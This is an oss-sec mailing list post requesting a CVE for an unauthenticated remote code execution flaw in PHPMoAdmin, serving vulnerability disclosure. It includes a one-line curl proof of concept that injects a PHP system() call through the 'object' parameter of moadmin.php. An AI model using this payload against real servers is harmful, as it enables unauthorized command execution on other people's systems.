oss-sec mailing list archives

CVE request: PHPMoAdmin Unauthorized Remote Code Execution

From: Henri Salo <henri () nerv fi>
Date: Wed, 4 Mar 2015 09:35:45 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello MITRE,

Can you assign 2015 CVE identifier for unauthorized remote code execution
vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/>, thanks.

curl "http://example.com/moadmin.php";; -d "object=1;system('id');exit"

Original advisory: http://seclists.org/fulldisclosure/2015/Mar/19

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJU9rXRAAoJECet96ROqnV0RAsP/RfOy2iFTxJKdfhQMQb+EXLZ
IoznODmRYkOeXhyEtr2Fd4I2lX5QUiMNCCN+tyfucOu9oQ7c7L8ihwSYJxtUfseU
nNoo+i3TKsUFqRQ7JOG4BgvPAMKhnUfisRC19Tz1WIrwRZiOl+EOpuiK3ll7zksB
XSSmGJjYCI3//gFeeNJmNpOg3StUVuIxQPKe9krItNRPsJFnpnV/maYxfr6+62el
HsX2eiGmYRIt4RY5YjSTYV06hmEiLv0LdhpH+AwxNopT1e58BY91le3v7Y/kkPl1
UiOHBvo1Pc2u1dIVO2UMUUyAkMIt+2BFmcnf35L1IFtg4kxZ663uIGFXdP0O1oMA
0BAvTYJNrDBWr6sIr0p4yLyq2YAOiUWuL88+sQN47eWRWfxlkIMYrAcWNZziYaiA
32Sm6rAGSET62jLDwUcblGHslZEGyMtDGT+P15R1m8DiQRpShISW0HTj3tzjUqri
5lHNMaZPRSwAxzmQrlAn7/GOM4TjPMSrzYmxGg01piuXvTxqA9tHzItS2cCkBLjq
q5bD/qZ1JrZ6C8QHOHwkGwe2FVK0g3CeqWKhqV4e4JlfMoeQ8CbPcfjamJceHrUp
/ihGZURp4ShdygRUJfSulfTD+YGftqgWfyR5Cp06Iae1hCqkrvvHaXPN1UDNAPaD
gTB3J0Hu3Tub3LkiLvSb
=lxia
-----END PGP SIGNATURE-----

Current thread:

CVE request: PHPMoAdmin Unauthorized Remote Code Execution Henri Salo (Mar 03)
- Re: CVE request: PHPMoAdmin Unauthorized Remote Code Execution cve-assign (Mar 04)